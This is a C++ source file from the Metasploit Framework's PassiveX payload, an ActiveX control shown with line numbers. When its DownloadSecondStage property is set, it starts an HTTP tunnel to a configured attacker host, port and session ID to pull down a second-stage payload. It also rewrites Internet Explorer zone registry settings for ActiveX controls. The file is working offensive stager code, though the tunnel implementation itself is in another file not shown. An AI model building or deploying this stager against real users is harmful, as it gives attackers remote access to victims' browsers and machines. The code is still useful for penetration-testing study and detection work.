Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
/*
2
 * This file is part of the Metasploit Exploit Framework
3
 * and is subject to the same licenses and copyrights as
4
 * the rest of this package.
5
 */
6
#include "PassiveXLib.h"
7
#include "CPassiveX.h"
8

9
#ifdef PXDEBUG
10
static FILE *DebugFd = NULL;
11
#endif
12

13
CPassiveX::CPassiveX()
14
: PropHttpPort(0)
15
{
16
}
17

18
CPassiveX::~CPassiveX()
19
{
20
	Tunnel.Stop();
21

22
#ifdef PXDEBUG
23
	if (DebugFd)
24
		fclose(
25
				DebugFd);
26
#endif
27
}
28

29
STDMETHODIMP CPassiveX::InterfaceSupportsErrorInfo(REFIID riid)
30
{
31
	if (::InlineIsEqualGUID(IID_IPassiveX, riid))
32
		return S_OK;
33

34
	return S_FALSE;
35
}
36

37
/**************
38
 * Properties *
39
 **************/
40

41
HRESULT CPassiveX::get_HttpHost(BSTR *Host)
42
{
43
	*Host = PropHttpHost;
44

45
	return S_OK;
46
}
47

48
HRESULT CPassiveX::put_HttpHost(BSTR Host)
49
{
50
	PropHttpHost = Host;
51

52
	return S_OK;
53
}
54

55
HRESULT CPassiveX::get_HttpSid(BSTR *Sid)
56
{
57
	*Sid = PropHttpSid;
58

59
	return S_OK;
60
}
61

62
HRESULT CPassiveX::put_HttpSid(BSTR Sid)
63
{
64
	PropHttpSid = Sid;
65

66
	return S_OK;
67
}
68

69
HRESULT CPassiveX::get_HttpUriBase(BSTR *UriBase)
70
{
71
	*UriBase = PropHttpUriBase;
72

73
	return S_OK;
74
}
75

76
HRESULT CPassiveX::put_HttpUriBase(BSTR UriBase)
77
{
78
	PropHttpUriBase = UriBase;
79

80
	return S_OK;
81
}
82

83
HRESULT CPassiveX::get_HttpPort(ULONG *Port)
84
{
85
	*Port = PropHttpPort;
86

87
	return S_OK;
88
}
89

90
HRESULT CPassiveX::put_HttpPort(ULONG Port)
91
{
92
	PropHttpPort = Port;
93

94
	return S_OK;
95
}
96

97
HRESULT CPassiveX::get_DownloadSecondStage(ULONG *Port)
98
{
99
	return S_OK;
100
}
101

102
HRESULT CPassiveX::put_DownloadSecondStage(ULONG Port)
103
{
104
	Initialize();
105

106
	return S_OK;
107
}
108

109
#ifdef PXDEBUG
110
/*
111
 * Logs a message to a file for debugging purposes
112
 */
113
VOID CPassiveX::Log(LPCTSTR fmt, ...)
114
{
115
	// If we haven't opened the debug log yet...
116
	if (!DebugFd)
117
	{
118
		TCHAR DebugFilePath[MAX_PATH];
119

120
		ZeroMemory(
121
				DebugFilePath,
122
				sizeof(DebugFilePath));
123

124
		ExpandEnvironmentStrings(
125
				TEXT("%TEMP%\\PassiveX.log"),
126
				DebugFilePath,
127
				(sizeof(DebugFilePath) / sizeof(TCHAR)) - 1);
128

129
		// Try to open the debug log file
130
		DebugFd = fopen(
131
				DebugFilePath,
132
				"a");
133
	}
134

135
	// If we have a valid debug file descriptor...use it
136
	if (DebugFd)
137
	{
138
		va_list Args;
139

140
		va_start(
141
				Args,
142
				fmt);
143

144
#ifndef _UNICODE
145
		vfprintf(
146
				DebugFd,
147
				fmt,
148
				Args);
149
#else
150
		// Lame...
151
		{
152
			USES_CONVERSION;
153

154
			LPCSTR AsciiString = OLE2A(fmt);
155

156
			vfprintf(
157
					DebugFd,
158
					AsciiString,
159
					Args);
160
		}
161
#endif
162

163
		va_end(
164
				Args);
165

166
		fflush(
167
				DebugFd);
168
	}
169
}
170
#endif
171

172
/*********************
173
 * Protected Methods *
174
 *********************/
175

176
/*
177
 * Restores internet explorer zone restrictions to defaults and creates the HTTP
178
 * tunnel as necessary
179
 */
180
VOID CPassiveX::Initialize()
181
{
182
	USES_CONVERSION;
183

184
	// If the HTTP port is valid, start the HTTP tunnel
185
	if ((PropHttpHost) &&
186
	    (PropHttpPort))
187
	{
188
		Tunnel.Start(
189
				OLE2A(PropHttpHost),
190
				OLE2A(PropHttpUriBase),
191
				OLE2A(PropHttpSid),
192
				(USHORT)PropHttpPort);
193
	}
194
	
195
	// Reset zone restrictions back to default
196
	ResetExplorerZoneRestrictions();
197
}
198

199
/*
200
 * Resets the internet explorer zone restrictions back to their defaults such
201
 * that people aren't left vulnerable
202
 */
203
VOID CPassiveX::ResetExplorerZoneRestrictions()
204
{
205
	ULONG Value;
206
	HKEY  InternetZoneKey = NULL;
207

208
	// Open the internet zone
209
	if (RegOpenKeyEx(
210
			HKEY_CURRENT_USER,
211
			TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3"),
212
			0,
213
			KEY_WRITE,
214
			&InternetZoneKey) == ERROR_SUCCESS)
215
	{
216
		// Download unsigned ActiveX controls
217
		Value = 3; // Disabled
218

219
		RegSetValueEx(
220
				InternetZoneKey,
221
				TEXT("1004"), 
222
				0,
223
				REG_DWORD,
224
				(LPBYTE)&Value,
225
				sizeof(Value));
226

227
		RegSetValueEx(
228
				InternetZoneKey,
229
				TEXT("1201"), 
230
				0,
231
				REG_DWORD,
232
				(LPBYTE)&Value,
233
				sizeof(Value));
234

235
		// Download signed ActiveX controls
236
		Value = 1; // Prompt
237

238
		RegSetValueEx(
239
				InternetZoneKey,
240
				TEXT("1001"), 
241
				0,
242
				REG_DWORD,
243
				(LPBYTE)&Value,
244
				sizeof(Value));
245

246
		// Run ActiveX controls and plugins
247
		Value = 0; // Enabled
248

249
		RegSetValueEx(
250
				InternetZoneKey,
251
				TEXT("1200"), 
252
				0,
253
				REG_DWORD,
254
				(LPBYTE)&Value,
255
				sizeof(Value));
256
	
257
		// Initialize and script ActiveX controls not marked as safe
258
		RegCloseKey(
259
				InternetZoneKey);
260
	}
261
}
262

263